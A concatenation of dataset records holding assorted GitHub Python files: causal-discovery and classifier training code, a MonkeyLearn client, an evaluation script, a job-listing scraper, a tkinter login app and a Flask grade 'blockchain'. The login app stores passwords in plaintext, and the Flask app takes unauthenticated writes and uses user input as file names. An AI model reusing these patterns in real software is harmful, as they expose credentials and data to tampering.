log: LogItems, key: str = \"loss/test\") -> int:\n return min(log.seq(key), key=lambda _: cast(float, _[1]))[0]\n\n def _prune(self) -> None:\n p = len(self._causal_order)\n parents = {\n self._causal_order[_]: self._causal_order[_+1:] for _ in range(p)\n }\n pruning_finished = {_: False for _ in self._causal_order}\n pruning_finished[self._causal_order[-1]] = True\n\n while not np.all(list(pruning_finished.values())):\n with ProcessPoolExecutor(\n max_workers=self._params[\"max_workers\"]) as executor:\n futures: list[tuple[int, int, list[int],\n int, Future[LogItems]]] = []\n for i, parents_i in parents.items():\n fin_i = pruning_finished[i]\n if not fin_i:\n for exclude_parent in parents_i:\n parents_i_new = [\n _ for _ in parents_i if _ != exclude_parent]\n\n if len(parents_i_new) > 0:\n logdir_prfx = \\\n f\"pruning{SEP}cause{i}effect\" + \\\n \"_\".join(str(_) for _ in parents_i_new) + \\\n f\"remove{exclude_parent}\"\n for t in range(self._params[\"n_trials\"]):\n logdir = self._params[\"logdir\"] + \\\n f\"{SEP}{logdir_prfx}{SEP}trial{t}\"\n seed = np.random.randint(1000000)\n\n self._params[\"l_logdir\"] = logdir\n self._params[\"l_seed\"] = seed\n params = deepcopy(self._params)\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n\n future = executor.submit(\n evaluate_prune,\n self._x_train, self._x_test,\n i, parents_i_new, exclude_parent,\n params, t\n )\n futures.append((i, exclude_parent,\n parents_i_new, t, future))\n else:\n logdir = \\\n self._params[\"logdir\"] + \\\n f\"{SEP}pruning{SEP}\" + \\\n f\"cause{i}remove{exclude_parent}\"\n self._params[\"l_logdir\"] = logdir\n params = deepcopy(self._params)\n t = 0\n future = executor.submit(\n evaluate_prune,\n self._x_train, self._x_test,\n i, parents_i_new, exclude_parent,\n params, t\n )\n futures.append((i, exclude_parent,\n parents_i_new, t, future))\n results = {\n (_[0], _[1], _[3]): (_[2], _[4].result()) for _ in futures\n } # {(child, excluded_parent, trial):(parents, results)}\n\n prune_logs: dict[int, dict[int, list[LogItems | None]]]\n prune_logs = defaultdict(dict)\n for (i, j, t), (pa, log) in results.items():\n if j not in prune_logs[i]:\n if len(pa) > 0:\n prune_logs[i][j] = [None, ] * self._params[\"n_trials\"]\n else:\n prune_logs[i][j] = [None, ]\n prune_logs[i][j][t] = log\n for i, prune_log in prune_logs.items():\n j, p_val = self._select_var(\n cast(dict[int, list[LogItems]], prune_log),\n \"loss/test\", \"comp/hsic/p\", np.min)\n\n # logging start\n pstfx = \"cause\" + \"_\".join(f\"{_}\" for _ in parents[i]) + \\\n f\"effect{i}\"\n # selected models\n logfn = self._params[\"logdir\"] + \\\n f\"{SEP}pruning{SEP}models_{pstfx}.csv\"\n csv = to_csv({\n _i: _d for _i, _d in enumerate(self._log_models)\n })\n with open(logfn, \"w\") as f:\n f.write(csv)\n # stats\n csv = \"\\n\".join(\n \",\".join(f\"{_}\" for _ in _l) for _l in self._log_stats\n ) + \"\\n\"\n logfn = self._params[\"logdir\"] + \\\n f\"{SEP}pruning{SEP}measures_{pstfx}.csv\"\n with open(logfn, \"w\") as f:\n f.write(csv)\n # logging end\n\n threshold = self._params[\"pruning_threshold\"]\n if p_val < threshold:\n parents[i] = [_ for _ in parents[i] if _ != j]\n if len(parents[i]) == 0:\n pruning_finished[i] = True\n else:\n pruning_finished[i] = True\n adjacency_matrix = np.zeros((p, p), dtype=int)\n for i, parents_i in parents.items():\n for j in parents_i:\n adjacency_matrix[i, j] = 1\n self._adjacency_matrix = adjacency_matrix\n\n @property\n def causal_order(self) -> list[int]:\n return self._causal_order\n\n @property\n def adjacency_matrix(self) -> NDArray[T]:\n return self._adjacency_matrix\n\n default_params = {\n \"logdir\": \"abpnl_results\",\n \"max_workers\": 1,\n \"n_trials\": 9,\n \"pruning_threshold\": 0.95,\n \"n_epoch\": 100,\n \"n_units\": 5,\n \"n_layers\": 3,\n \"activation\": F.leaky_relu,\n \"loss_balance\": 0.5,\n \"batchsize\": 64,\n \"dropout\": True,\n \"optimizer\": Adam,\n \"learning_rate\": 1e-3,\n \"interval_test\": 1,\n \"interval_save\": -1,\n }\n\n\ndef train(\n x_train: NtoOneDataset[T], x_test: NtoOneDataset[T],\n params: dict[str, Any],\n noise_stats_samples: NDArray[T] | None = None\n ) -> LogItems:\n seed = params[\"l_seed\"]\n np.random.seed(seed)\n torch.manual_seed(seed)\n py_random.seed(seed)\n\n pp(params[\"l_logdir\"])\n\n train_loader = DataLoader(x_train, batch_size=params[\"batchsize\"],\n shuffle=True)\n test_loader = DataLoader(x_test, batch_size=len(x_test))\n\n model = AbPNLModel(\n nx=len(x_train.causes), ny=1,\n nz=params[\"n_units\"], nl=params[\"n_layers\"],\n actf=params[\"activation\"], a=params[\"loss_balance\"],\n )\n opt = cast(\n Optimizer,\n params[\"optimizer\"](model.parameters(), params[\"learning_rate\"])\n )\n log_items = LogItems(dict)\n\n iteration = -1\n for epoch in range(params[\"n_epoch\"]):\n for x, y in train_loader:\n iteration += 1\n\n opt.zero_grad()\n loss = model(x, y)\n loss.backward()\n opt.step()\n\n log_items[iteration].update({\n \"epoch\": epoch, \"iteration\": iteration,\n \"loss/train\": model.loss,\n \"loss_ind/train\": model.loss_ind,\n \"loss_inv/train\": model.loss_inv,\n })\n\n if (epoch+1) % params[\"interval_test\"] == 0:\n x, y = test_loader.__iter__().next() # Get all the test samples.\n model.train(False)\n with torch.no_grad():\n loss = model(x, y)\n model.train(True)\n\n log_items[iteration].update({\n \"loss/test\": model.loss,\n \"loss_ind/test\": model.loss_ind,\n \"loss_inv/test\": model.loss_inv,\n })\n\n # Will be used for checking reconstruction failure.\n arr_y = y.detach().numpy()\n log_items[iteration].update({\n \"y_stats/mean\": arr_y.mean(),\n \"y_stats/variance\": arr_y.var(),\n })\n\n if noise_stats_samples is not None:\n z = stats.standardize(noise_stats_samples)\n e = stats.standardize(model.e)\n p_val = stats.calc_HSIC_p(z, e)\n log_items[iteration].update({\n \"comp/hsic/p\": p_val\n })\n\n if (params[\"interval_save\"] > 0) and \\\n ((epoch+1) % params[\"interval_save\"] == 0):\n torch.save(\n model.state_dict(),\n params[\"l_logdir\"]\n + f\"{SEP}model_iter{iteration}\"\n )\n\n torch.save(\n model.state_dict(),\n params[\"l_logdir\"] + f\"{SEP}model_final\")\n\n csv = to_csv(log_items)\n with open(params[\"l_logdir\"] + f\"{SEP}log.csv\", \"w\") as f:\n f.write(csv)\n\n return log_items\n\n\ndef evaluate_prune(\n x_train: Sequence[Sequence[T]], x_test: Sequence[Sequence[T]],\n child: int, parents: list[int],\n excluded_parent: int, params: dict[str, Any], t: int\n ) -> LogItems:\n if len(parents) > 0:\n ds_train = NtoOneDataset(x_train, parents, child)\n ds_test = NtoOneDataset(x_test, parents, child)\n z = np.array(x_test)[:, excluded_parent]\n\n logs = train(ds_train, ds_test, params, z)\n else:\n x = np.array(x_test)[:, excluded_parent]\n y = np.array(x_test)[:, child]\n\n p_val = stats.calc_HSIC_p(stats.standardize(x), stats.standardize(y))\n logs = LogItems(dict)\n logs[0].update({\n \"comp/hsic/p\": p_val\n })\n # Dummy\n logs[0].update({\n \"loss/test\": 0.0,\n \"loss_inv/test\": 0.0,\n \"y_stats/variance\": 1.0,\n })\n\n os.makedirs(params[\"l_logdir\"], exist_ok=True)\n csv = to_csv(logs)\n with open(params[\"l_logdir\"] + f\"{SEP}log.csv\", \"w\") as f:\n f.write(csv)\n\n return logs\n","repo_name":"grigor97/abpnl","sub_path":"abpnl/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":18875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"21502874087","text":"# Login System\n\n# File \nperson = {} #\nwith open(\"Login.txt\",\"r+\") as file:\n for line in file:\n splitline = line.split()\n person[splitline[0]] = ','.join(splitline[1:]) # !!\n\n\nimport tkinter # GUI : Graphical User Interface\nimport tkinter.messagebox\n\ndef Sign_up(): # Sign up (Kaydol)\n \n nm = theEntry1.get() # Name\n #nm = nm.title() # first letter is capital\n ps = theEntry2.get() # Password\n \n A = ''\n if nm.count(' ') > 0: # This code diversify -> Hello_world \n for i in nm:\n if i == ' ':\n i = '_'\n A += i\n nm = A\n A = ''\n if ps.count(' ') > 0: # This code diversify -> Hello_world \n for i in ps:\n if i == ' ':\n i = '_'\n A += i\n ps = A\n \n \n if nm in person: \n tkinter.messagebox.showerror(\"Error\",\"Another user have this username\")\n \n elif person.keys() != nm: \n person[nm] = ps \n with open(\"Login.txt\",\"a\") as file:\n file.writelines(f\" {nm} \")\n \n with open(\"Login.txt\",\"a\") as file:\n file.writelines(f\" {ps} \\n\")\n \n\ndef Sign_in(): # Sign in (Oturum aç)\n \n nm = theEntry1.get() # Name\n #nm = nm.title() # first letter is capital\n ps = theEntry2.get() # Password\n \n A = ''\n if nm.count(' ') > 0: # This code diversify -> Hello_world \n for i in nm:\n if i == ' ':\n i = '_'\n A += i\n nm = A\n if ps.count(' ') > 0: # This code diversify -> Hello_world \n for i in ps:\n if i == ' ':\n i = '_'\n A += i\n ps = A\n \n if nm in person.keys():\n if person[nm] == ps:\n tkinter.messagebox.showinfo(\"Log in message\",\"Access is success\")\n else:\n tkinter.messagebox.showerror(\"Log in message\",\"Access denied\")\n else:\n tkinter.messagebox.showerror(\"Log in message\",\"Access denied\")\n \n\n\nroot = tkinter.Tk() # Basic window\n\nroot.configure(background=\"white\")\nroot.iconbitmap(\"C:/Users/Dell/Desktop/GitHub/Python/Basic_PythonExamples/Login System/person.ico\")\nroot.title(\"Login System\")\nroot.minsize(width=500,height=300)\nroot.resizable(width=False,height=False)\n\n# Username\nUser = tkinter.Label(root,font=\"arial 14\",fg=\"red\",text=\"Username : \",bg=\"white\")\nUser.place(x=100,y=20,width=100,height=30)\n# x and y coordinates\n\ntheEntry1 = tkinter.Entry(root,font=\"arial 14\",fg=\"black\",bd=2)\ntheEntry1.place(x=220,y=20,width=200,height=30)\n\n# Password\nPass = tkinter.Label(root,font=\"arial 14\",fg=\"red\",text=\"Password : \",bg=\"white\")\nPass.place(x=100,y=60,width=100,height=30)\n# x and y coordinates\n\ntheEntry2 = tkinter.Entry(root,font=\"arial 14\",fg=\"black\",bd=2,show=\"*\")\ntheEntry2.place(x=220,y=60,width=200,height=30)\n\n# Sign in Button\nLog = tkinter.Button(root,font=\"arial 14\",fg=\"white\",text=\"Sign in\",bd=0,bg=\"#64c4ed\",command=Sign_in)\nLog.place(x=220,y=100,width=200,height=30)\n\n# Sign up Button\nLog = tkinter.Button(root,font=\"arial 14\",fg=\"white\",text=\"Sign up\",bd=0,bg=\"#64c4ed\",command=Sign_up)\nLog.place(x=220,y=140,width=200,height=30)\n\nroot.mainloop()","repo_name":"YunusEmreAlps/Python_Examples","sub_path":"Login System/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40039830932","text":"import abc\nimport json\nimport sys\n\nfrom monkeylearn import MonkeyLearn\n\n\nclass BaseClient(abc.ABC):\n def __init__(self, config_obj):\n self.count = 0\n self.data = []\n self.config = config_obj\n\n @abc.abstractmethod\n def fetch_sentiments(self, keyword, data_file_path):\n pass\n\n\nclass MonkeyLearnClient(BaseClient):\n def __init__(self, config_obj):\n super().__init__(config_obj)\n self.model_id = self.config.MONKEYLEARN_MODEL_ID\n self.client = MonkeyLearn(self.config.MONKEYLEARN_API_TOKEN)\n\n def _load_data(self, data_file_path):\n with open(data_file_path, \"r\") as fp:\n for line in fp.readlines():\n try:\n data = line.strip()\n self.data.append(data)\n except json.decoder.JSONDecodeError:\n print(f\"Failing {data}\", file=sys.stderr)\n\n def fetch_sentiments(self, keyword, data_file_path):\n self._load_data(data_file_path)\n\n if self.config.FLASK_ENV == \"production\":\n response = self.client.classifiers.classify(\n model_id=self.model_id,\n data=self.data,\n auto_batch=True,\n retry_if_throttled=True,\n )\n\n return response.body\n return [\n {\n \"text\": \"This is a great tool!\",\n \"external_id\": None,\n \"error\": False,\n \"classifications\": [\n {\n \"tag_name\": \"Positive\",\n \"tag_id\": 33767179,\n \"confidence\": 0.998,\n }\n ],\n },\n {\n \"text\": \"This is a great tool!\",\n \"external_id\": None,\n \"error\": False,\n \"classifications\": [\n {\n \"tag_name\": \"Positive\",\n \"tag_id\": 33767179,\n \"confidence\": 0.998,\n }\n ],\n },\n ]\n\n\nclient_map = {\"monkeylearn\": MonkeyLearnClient}\n","repo_name":"court-room/rinnegan-flask","sub_path":"lib/rinnegan_worker/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37060131387","text":"import numpy as np\nimport torch\nimport train\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom copy import deepcopy\n\ndef test_with_dataloader(model, test_loader, weight=None):\n all_score = []\n all_gt = []\n all_frame = []\n all_name = []\n model.eval()\n for i, data in enumerate(test_loader):\n inputs, gts, frames, names = data\n inputs = inputs.view(-1, inputs.size(-1)).to(torch.device('cuda'))\n pred = model(inputs, vars=weight)\n all_score.append(pred.cpu().detach().numpy())\n all_gt += gts\n all_frame += frames\n all_name += names\n model.train()\n num_video = len(all_frame)\n all_score = np.concatenate(all_score).reshape(num_video, -1)\n return all_score, all_gt, all_frame, all_name\n\n\ndef get_auc(score_by_frame, gt_by_frame):\n idx = np.argsort(-score_by_frame)\n tp = gt_by_frame[idx] > 0\n fp = gt_by_frame[idx] == 0\n\n cumsum_tp = np.cumsum(tp)\n cumsum_fp = np.cumsum(fp)\n\n nrpos = np.sum(gt_by_frame)\n rec = cumsum_tp / nrpos\n fpr = cumsum_fp / np.sum(gt_by_frame == 0)\n\n auc = np.trapz(rec, fpr)\n return auc\n\n\ndef get_fpr(score_by_frame, gt_by_frame, threshold=0.5):\n pred = (score_by_frame > threshold).astype(int)\n n_neg = np.sum(gt_by_frame==0)\n fp = ((pred == 1).astype(int) * (pred != gt_by_frame).astype(int)).sum()\n return fp/n_neg\n\n\ndef seg2frame(actual_frames, score, gt, fixed_len=True):\n detection_score_per_frame = np.zeros(actual_frames)\n if not fixed_len:\n for i in range((actual_frames-1)//16+1):\n detection_score_per_frame[i*16:(i+1)*16] = score[i]\n else:\n thirty2_shots = np.round(np.linspace(0, actual_frames//16, 33))\n for i in range(len(thirty2_shots)-1):\n ss = int(thirty2_shots[i])\n ee = int(thirty2_shots[i+1])-1\n\n if ee M_s or M_g (For M_g, we manually find best model\n by collecting outputs of different experiments)\n 2. if is_sampling == False\n 2.1 if args.chpt is None --> S (Scratch)\n 2.2 else --> P (Pretrain)\n '''\n if sampling:\n # Meta-model test code\n # Select best model sampled every 300 epochs\n start_epoch, end_epoch = 0, 3000\n epoch_step = 300\n best_epoch, best_auc = -1, -1\n for i in range(start_epoch, end_epoch + 1, epoch_step):\n if args.chpt is not None:\n # Name of chpt file is like '{}epochs_exp1_seed1_lr0.001_split1.pkl'\n model_path = os.path.join('meta_model', args.chpt.format(i))\n model.load_state_dict(torch.load(model_path))\n auc, _ = eval_with_cv(model, ft_loader, cv_loader_list, eval_loader, criterion, args)\n print(auc)\n if auc > best_auc:\n best_auc = auc\n best_epoch = i\n print(\"Best AUC: {} at {} meta-iters\".format(best_auc, best_epoch))\n else:\n # Pretrain (baseline) test code\n if args.chpt is not None:\n model_path = os.path.join('pretrain', args.chpt)\n model.load_state_dict(torch.load(model_path))\n\n auc, best_epoch = eval_with_cv(model, ft_loader, cv_loader_list, eval_loader, criterion, args)\n print(\"Best AUC: {} \".format(auc))\n\n","repo_name":"junha-kim/Learning-to-Adapt-to-Unseen-Abnormal-Activities","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"25479006084","text":"import torch\nimport os\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nimport argparse\nfrom os.path import join, split\nimport shutil\nfrom data_fashion import test_set, val_set, train_set, train_sampler, val_sampler\nfrom model import Class_Net, Class_Net96\n# import sys\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\ndef mkdir(path):\n\tfolder = os.path.exists(path)\n\tif not folder: \n\t\tos.makedirs(path)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='cs194 proj4')\n parser.add_argument('--batch-size', type=int, default=64,\n help='input batch size for training (default: 64)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n help='SGD momentum (default: 0.9)')\n parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\n parser.add_argument('--workers', type=int, default=8)\n parser.add_argument('--freq', default=10, type=int)\n parser.add_argument('--cp_dir', default='./')\n parser.add_argument('--log', default='./') \n\n args = parser.parse_args()\n return args\n\ndef accuracy(output, target):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n _, pred = output.max(1)\n pred = pred.view(1, -1)\n target = target.view(1, -1)\n correct = pred.eq(target)\n\n correct = correct.view(-1)\n score = correct.float().sum(0).mul(100.0 / correct.size(0))\n return score.item()\n\ndef validate(model, val_loader, criterion, eval_score):\n args = parse_args()\n print_freq = args.freq\n losses = AverageMeter()\n score = AverageMeter()\n\n model.eval()\n for i, (input, target) in enumerate(val_loader):\n input = input.cuda().float()\n target = target.cuda().long()\n with torch.no_grad():\n output = model(input)\n loss = criterion(output, target)\n \n losses.update(loss.item(), input.size(0))\n score.update(eval_score(output, target), input.size(0))\n \n print('Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Score {top1.val:.3f} ({top1.avg:.3f})'.format(loss=losses, top1=score), flush=True)\n \n return score.avg\n\n\ndef train(model, train_loader, val_loader, optimizer, criterion, writer, epoch, eval_score):\n args = parse_args() \n checkpoint_dir = args.cp_dir\n print_freq = args.freq\n for k, v in args.__dict__.items():\n print(k, ':', v)\n \n criterion.cuda()\n best_prec1 = 0\n start_epoch = 0\n global_step = 0\n \n for epoch in range(start_epoch, args.epochs):\n losses = AverageMeter()\n scores = AverageMeter()\n model.train()\n for i, (input, target) in enumerate(train_loader):\n optimizer.zero_grad()\n input = input.cuda().float()\n target = target.cuda().long()\n output = model(input)\n loss = criterion(output, target)\n\n writer.add_scalar('Loss/train', loss.item(), global_step)\n losses.update(loss.item(), input.size(0))\n scores.update(eval_score(output, target), input.size(0))\n writer.add_scalar('accuracy/train', scores.avg, global_step)\n\n loss.backward()\n optimizer.step() \n global_step += 1\n\n \n print('Epoch: [{0}]\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Score {top1.val:.3f} ({top1.avg:.3f})'.format(\n epoch, loss=losses, top1=scores))\n\n prec1 = validate(model, val_loader, criterion, eval_score)\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n writer.add_scalar('accuracy/val', prec1, epoch+1)\n\n checkpoint_path = join(checkpoint_dir,'checkpoint_{}.pth.tar'.format(epoch))\n cp_state = {\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'prec1': prec1,\n }\n torch.save(cp_state, checkpoint_path)\n if is_best:\n torch.save(cp_state, join(checkpoint_dir, 'best_checkpoint.pth.tar'))\n\n writer.close()\n\nif __name__=='__main__':\n args = parse_args()\n train_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers, \n sampler=train_sampler, pin_memory=True)\n val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers, \n sampler=val_sampler, pin_memory=True)\n writer = SummaryWriter(comment= args.log)\n criterion = nn.CrossEntropyLoss()\n mkdir(args.cp_dir)\n\n # model = Class_Net()\n model = Class_Net()\n\n model = torch.nn.DataParallel(model).cuda()\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n train(model, train_loader, val_loader, optimizer, criterion, writer, args.epochs, accuracy) \n\n \n\n\n","repo_name":"xd-liu/Image-Manipulation","sub_path":"p4/part1_classify/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74441533288","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass NaukriSpider(scrapy.Spider):\n # url = \"https://www.naukri.com/data-analyst-jobs-in-ncr\"\n name = 'naukri'\n subUrl = \"data-analyst-jobs-in-ncr/\"\n allowed_domains = ['naukri.com']\n start_urls = [\"https://www.naukri.com/data-analyst-jobs-in-ncr/\"]\n\n def parse(self, response):\n for job in response.xpath(\"//div[@type='tuple']\"):\n item = {\n \"title\": job.xpath(\"a/ul/li[@class='desig']/@title\").extract_first(),\n \"url\": job.xpath(\"a/@href\").extract_first(),\n\n \"company\": job.xpath(\"a/span/span[@class='org']/text()\").extract_first(),\n \"ratings\": job.xpath(\"a/span/span[@class='rating']/text()\").extract_first(),\n\n \"reviews\": job.xpath(\"a/span/span[@class='rating']\\\n /span[@class='review']/text()\").extract_first(),\n\n\n \"expierence\": job.xpath(\"a/span[@class='exp']/text()\").extract_first(),\n \"location\": job.xpath(\"a/span[@class='loc']/span/text()\").extract_first(),\n \"keyskills\": job.xpath(\"a/div[@class='more']/div[@class='desc']\\\n /span[@class='skill']/text()\").extract_first(),\n\n \"desc\": job.xpath(\"a/div[@class='more']\\\n /span[@class='desc']/text()\").extract_first(),\n\n \"salary\": job.xpath(\"div[@class='other_details']//\\\n span[@class='salary ']/text()\").extract_first(),\n\n \"posted_by\": job.xpath(\"div[@class='other_details']/\\\n div[@class='rec_details']/a[@class='rec_name']/text()\").extract_first(),\n\n \"posted_on\": job.xpath(\"div[@class='other_details']/\\\n div[@class='rec_details']/span[@class='date']/text()\").extract_first(),\n }\n yield item\n\n next_page_url = response.xpath(\"//div[@class='pagination']/a/@href\").extract()[-1]\n if next_page_url:\n request = scrapy.Request(url=next_page_url)\n yield request\n\n\n\n","repo_name":"jai-singhal/data_science","sub_path":"scrapping/naukri.py","file_name":"naukri.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19164839136","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 12 10:45:42 2020\r\n\r\n@author: OPEN NOW\r\n\"\"\"\r\n\r\nfrom flask import Flask, request, jsonify,render_template\r\nfrom werkzeug import secure_filename\r\nimport csv\r\nfrom hashlib import sha256\r\nfrom time import time\r\nimport json\r\nimport os.path\r\n\r\n\r\nclass blockchain(object):\r\n def __init__(self,student_id):\r\n self.chain=[]\r\n self.student_id = student_id\r\n \r\n # sha256 hash\r\n def data_hash(self,data):\r\n return sha256(str(data).encode('utf8')).hexdigest()\r\n \r\n # last block \r\n def _lastBlock(self):\r\n\r\n data = {\r\n 'stid': None,\r\n 'code': None,\r\n 'grade': None,\r\n 'time':None,\r\n 'year':None,\r\n 'seme':None,\r\n 'creater':None,\r\n }\r\n\r\n header = {\r\n 'index':len(self.chain)+1,\r\n 'timestamp':time(),\r\n 'prev_hash':self.data_hash(self.chain[-1]),\r\n 'hashData': self.data_hash(data),\r\n }\r\n \r\n block = {'header':header,'data': data} \r\n self.chain.append(block)\r\n \r\n # current block + last block create\r\n def generic_block(self):\r\n\r\n data = {\r\n 'stid': self.student_id,\r\n 'code': None,\r\n 'grade': None,\r\n 'time':time(),\r\n 'year':None,\r\n 'seme':None,\r\n 'creater':None,\r\n }\r\n \r\n header = {\r\n 'index':1,\r\n 'timestamp':time(),\r\n 'prev_hash':None,\r\n 'hashData': self.data_hash(data),\r\n }\r\n\r\n block = {'header':header,'data': data} \r\n self.chain.append(block)\r\n self._lastBlock() \r\n \r\n def verify(self):\r\n currentB=self.chain[-1] \r\n valid=True\r\n index = len(self.chain)-1\r\n \r\n while (index > 0 and valid == True):\r\n \r\n prev_B=self.chain[index-1]\r\n \r\n if(currentB['header']['prev_hash']==self.data_hash(prev_B)):\r\n currentB = prev_B\r\n valid = True\r\n index -= 1\r\n \r\n else:\r\n valid=False\r\n index -= 1\r\n \r\n return valid\r\n \r\n def load_data(self):\r\n \r\n filename = str(self.student_id + \".json\")\r\n print (filename)\r\n \r\n if os.path.exists(filename) == True:\r\n \r\n # load json to self.chain\r\n with open(filename, \"r\") as f:\r\n reader = json.load(f)\r\n for row in reader:\r\n self.chain.append(row)\r\n \r\n return True\r\n else:\r\n print(\"Nots\")\r\n return False\r\n \r\n def save_data(self):\r\n \r\n filename = str(self.student_id + \".json\")\r\n \r\n try:\r\n\t with open(filename,'w') as f:\r\n\t json.dump(self.chain,f)\r\n\t return True\r\n\t\t\r\n except IOError:\r\n return False\r\n\r\n def input_data(self,stdid,code,grade,year,seme,creator):\r\n \r\n #print(self.chain[-1]['header']['prev_hash'])\r\n\r\n tmpBlock = self.chain[-1]\r\n \r\n tmpBlock['data']['stid'] = stdid\r\n tmpBlock['data']['code'] = code\r\n tmpBlock['data']['grade'] = grade\r\n tmpBlock['data']['time'] = time()\r\n tmpBlock['data']['year'] = year\r\n tmpBlock['data']['seme'] = seme\r\n tmpBlock['data']['creater'] = creator\r\n \r\n tmpBlock['header']['index'] = len(self.chain)\r\n tmpBlock['header']['timestamp'] = time()\r\n tmpBlock['header']['hashData'] = self.data_hash(tmpBlock['data'])\r\n \r\n self._lastBlock() \r\n \r\n\"\"\"\r\nstart flask\r\n\"\"\"\r\napp = Flask(__name__)\r\n\r\n\"\"\"\r\nsave grade \r\n\"\"\"\t\r\n@app.route('/add', methods=['POST'])\r\ndef adding():\r\n\r\n data = request.get_json()\r\n \r\n bc = blockchain(data[\"stdid\"])\r\n\r\n # check existing \r\n if bc.load_data() == True:\r\n \tbc.input_data(data[\"stdid\"],data[\"code\"],data[\"grade\"],data[\"year\"],data[\"seme\"],data[\"creator\"])\r\n \tif bc.save_data() == True:\r\n \t\tres_code = 1\r\n \telse:\r\n \t\tres_code = 0\r\n else:\r\n \tbc.generic_block()\r\n \tbc.input_data(data[\"stdid\"],data[\"code\"],data[\"grade\"],data[\"year\"],data[\"seme\"],data[\"creator\"])\r\n \tif bc.save_data() == True:\r\n \t\tres_code = 1\r\n \telse:\r\n \t\tres_code = 0\r\n \t\r\n response = {\r\n \t\t\r\n \t\t\"res_code\": res_code\r\n \r\n }\r\n return jsonify(response), 200\r\n\"\"\"\r\nVerify grade \r\n\"\"\"\r\n@app.route('/cp', methods=['POST'])\r\ndef compareG():\r\n \r\n req_data = request.get_json()\r\n \r\n stid = req_data['stdid']\r\n grade = req_data['grade']\r\n code = req_data['code']\r\n year = req_data['year']\r\n seme = req_data['seme']\r\n print(stid,grade,code,year,seme)\r\n \r\n \r\n bc = blockchain(stid)\r\n\r\n \r\n if bc.load_data ()==True:\r\n response = {'res_code':\"load data\"}\r\n if bc.verify ()==True:\r\n response = {'res_code':\"verify\"}\r\n vf=True\r\n \r\n #เราไม่เอาบล็อกสุดท้าย index จะเริ่มที่ 1 ให้ตรงกับค่า len\r\n i=len(bc.chain)-1\r\n for block in bc.chain:\r\n block=bc.chain[i]\r\n i=i-1\r\n if vf==True:\r\n if block['data']['stid']==stid:\r\n if block['data']['code']==code:\r\n if block['data']['year']==year:\r\n if block['data']['seme']==seme:\r\n if block['data']['grade']==grade:\r\n response = {'res_code':1,'valid':True}\r\n vf=False\r\n print (response)\r\n return jsonify(response)\r\n elif block['data']['grade']!=grade:\r\n response = {'res_code':0,'valid':\"false\"}\r\n vf=False\r\n print (response)\r\n return jsonify(response)\r\n break\r\n if block['header']['index']==1: \r\n response = {'res_code':101,'valid':\"Don't have data\"}\r\n print (response)\r\n return jsonify(response) \r\n \r\n elif bc.verify ()!=True: \r\n response = {'res_code':102,'valid':\"Data in blockchain Not good!\"}\r\n print (response)\r\n return jsonify(response) \r\n \r\n elif bc.load_data ()!=True: \r\n response = {'res_code':101,'valid':\"Don't have data\"}\r\n print (response)\r\n return jsonify(response) \r\n\"\"\"\r\nshow grade \r\n\"\"\"\r\n@app.route('/', methods=['GET'])\r\ndef show(uid):\r\n bc = blockchain(uid)\r\n bc.load_data()\r\n \r\n response = {\r\n 'chain': bc.chain\r\n }\r\n\r\n return jsonify(response), 200 \r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=2000)","repo_name":"Supadtra/5920310035","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22177474942","text":"\"\"\"\r\n\r\nThis module simulates the snake game - You can its head to it the food and grow.\r\n\r\n@author Seongrim Choi (sc83)\r\n@date: Fall, 2021\r\n\"\"\"\r\nfrom random import randint\r\n\r\nclass Particle:\r\n def __init__(self, x=0, y=0, radius=10, color=\"yellow\"):\r\n \"\"\"Instantiate a particle object.\"\"\"\r\n # Randomizes the location of the food appearing.\r\n if x == 0:\r\n x = randint(20, 730)\r\n if y == 0:\r\n y = randint(20, 530)\r\n self.x = x\r\n self.y = y\r\n self.radius = radius\r\n self.color = color\r\n\r\n def draw(self, 